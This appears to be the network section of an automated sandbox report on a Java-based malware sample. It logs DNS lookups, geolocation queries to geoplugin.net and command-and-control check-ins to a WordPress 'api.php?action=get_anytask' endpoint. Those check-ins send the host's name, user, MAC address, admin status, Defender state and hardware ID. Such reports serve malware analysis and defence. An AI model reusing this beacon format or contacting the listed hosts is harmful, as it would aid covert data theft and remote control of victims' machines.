                        Apr 5, 2023 11:38:50.987679958 CEST192.168.2.48.8.8.80x6e64Standard query (0)www.geoplugin.netA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:58.811969042 CEST192.168.2.48.8.8.80x402Standard query (0)adrenalinecyber.comA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:01.432755947 CEST192.168.2.48.8.8.80x176eStandard query (0)adrenalinecyber.comA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:08.900214911 CEST192.168.2.48.8.8.80x8bd1Standard query (0)adrenalinecyber.comA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:11.503990889 CEST192.168.2.48.8.8.80x30a5Standard query (0)adrenalinecyber.comA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:18.942569017 CEST192.168.2.48.8.8.80x38c7Standard query (0)www.paradisodomenico.itA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:21.544714928 CEST192.168.2.48.8.8.80x71adStandard query (0)www.paradisodomenico.itA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Apr 5, 2023 11:38:45.908870935 CEST8.8.8.8192.168.2.40x4e6bName error (3)adrenalinecyber.comnonenoneA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:48.404733896 CEST8.8.8.8192.168.2.40x6496No error (0)www.geoplugin.netgeoplugin.netCNAME (Canonical name)IN (0x0001)false
                        Apr 5, 2023 11:38:48.404733896 CEST8.8.8.8192.168.2.40x6496No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:50.763087988 CEST8.8.8.8192.168.2.40xdffeName error (3)adrenalinecyber.comnonenoneA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:51.009295940 CEST8.8.8.8192.168.2.40x6e64No error (0)www.geoplugin.netgeoplugin.netCNAME (Canonical name)IN (0x0001)false
                        Apr 5, 2023 11:38:51.009295940 CEST8.8.8.8192.168.2.40x6e64No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                        Apr 5, 2023 11:38:58.848505974 CEST8.8.8.8192.168.2.40x402Name error (3)adrenalinecyber.comnonenoneA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:01.456254005 CEST8.8.8.8192.168.2.40x176eName error (3)adrenalinecyber.comnonenoneA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:08.921135902 CEST8.8.8.8192.168.2.40x8bd1Name error (3)adrenalinecyber.comnonenoneA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:11.525038004 CEST8.8.8.8192.168.2.40x30a5Name error (3)adrenalinecyber.comnonenoneA (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:18.999263048 CEST8.8.8.8192.168.2.40x38c7No error (0)www.paradisodomenico.itparadisodomenico.itCNAME (Canonical name)IN (0x0001)false
                        Apr 5, 2023 11:39:18.999263048 CEST8.8.8.8192.168.2.40x38c7No error (0)paradisodomenico.it46.16.95.61A (IP address)IN (0x0001)false
                        Apr 5, 2023 11:39:21.615022898 CEST8.8.8.8192.168.2.40x71adNo error (0)www.paradisodomenico.itparadisodomenico.itCNAME (Canonical name)IN (0x0001)false
                        Apr 5, 2023 11:39:21.615022898 CEST8.8.8.8192.168.2.40x71adNo error (0)paradisodomenico.it46.16.95.61A (IP address)IN (0x0001)false
                        • www.paradisodomenico.it
                        • www.geoplugin.net
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44969846.16.95.61443C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        TimestampkBytes transferredDirectionData


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.44969946.16.95.61443C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        TimestampkBytes transferredDirectionData


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.449696178.237.33.5080C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        TimestampkBytes transferredDirectionData
                        Apr 5, 2023 11:38:48.449275970 CEST135OUTGET /json.gp?ip= HTTP/1.1
                        User-Agent: Java/1.8.0_211
                        Host: www.geoplugin.net
                        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                        Connection: keep-alive
                        Apr 5, 2023 11:38:48.479932070 CEST137INHTTP/1.1 200 OK
                        date: Wed, 05 Apr 2023 09:38:48 GMT
                        server: Apache
                        expires: Wed, 05 Apr 2023 09:38:48 GMT
                        content-length: 944
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 30 35 36 0a 7d
                        Data Ascii: { "geoplugin_request":"102.129.143.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9056}
                        Apr 5, 2023 11:38:48.498128891 CEST137OUTGET /json.gp?ip= HTTP/1.1
                        User-Agent: Java/1.8.0_211
                        Host: www.geoplugin.net
                        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                        Connection: keep-alive
                        Apr 5, 2023 11:38:48.529597998 CEST138INHTTP/1.1 200 OK
                        date: Wed, 05 Apr 2023 09:38:48 GMT
                        server: Apache
                        content-length: 944
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 30 35 36 0a 7d
                        Data Ascii: { "geoplugin_request":"102.129.143.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9056}


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.449697178.237.33.5080C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        TimestampkBytes transferredDirectionData
                        Apr 5, 2023 11:38:51.046195030 CEST139OUTGET /json.gp?ip= HTTP/1.1
                        User-Agent: Java/1.8.0_211
                        Host: www.geoplugin.net
                        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                        Connection: keep-alive
                        Apr 5, 2023 11:38:51.084790945 CEST140INHTTP/1.1 200 OK
                        date: Wed, 05 Apr 2023 09:38:51 GMT
                        server: Apache
                        content-length: 944
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 30 35 36 0a 7d
                        Data Ascii: { "geoplugin_request":"102.129.143.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9056}
                        Apr 5, 2023 11:38:51.098398924 CEST140OUTGET /json.gp?ip= HTTP/1.1
                        User-Agent: Java/1.8.0_211
                        Host: www.geoplugin.net
                        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                        Connection: keep-alive
                        Apr 5, 2023 11:38:51.128781080 CEST141INHTTP/1.1 200 OK
                        date: Wed, 05 Apr 2023 11:10:19 GMT
                        server: Apache
                        content-length: 944
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 31 34 31 0a 7d
                        Data Ascii: { "geoplugin_request":"102.129.143.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9141}


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44969846.16.95.61443C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        TimestampkBytes transferredDirectionData
                        2023-04-05 09:39:19 UTC0OUTGET /wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=admin&Def=OFF&hwid=bcfca15a1fe879c681f1459b1b147c6e HTTP/1.1
                        User-Agent: Java/1.8.0_211
                        Host: www.paradisodomenico.it
                        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                        Connection: keep-alive
                        2023-04-05 09:39:19 UTC0INHTTP/1.1 200 OK
                        Date: Wed, 05 Apr 2023 09:39:19 GMT
                        Server: Apache
                        Upgrade: h2,h2c
                        Connection: Upgrade, close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2023-04-05 09:39:19 UTC0INData Raw: 33 0d 0a 6e 6f 74 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 3not0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.44969946.16.95.61443C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                        TimestampkBytes transferredDirectionData
                        2023-04-05 09:39:21 UTC0OUTGET /wp-content//api.php?action=get_anytask&ip=&computer_name=305090&user_name=user&mac=EC-F4-BB-EA-15-88&country_code=CH&is_admin=normal&Def=ON&hwid=bcfca15a1fe879c681f1459b1b147c6e HTTP/1.1
                        User-Agent: Java/1.8.0_211
                        Host: www.paradisodomenico.it
                        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
                        Connection: keep-alive
                        2023-04-05 09:39:22 UTC0INHTTP/1.1 200 OK
                        Date: Wed, 05 Apr 2023 09:39:21 GMT
                        Server: Apache
                        Upgrade: h2,h2c
                        Connection: Upgrade, close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2023-04-05 09:39:22 UTC1INData Raw: 33 0d 0a 6e 6f 74 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 3not0


                        Click to jump to process

                        Click to jump to process

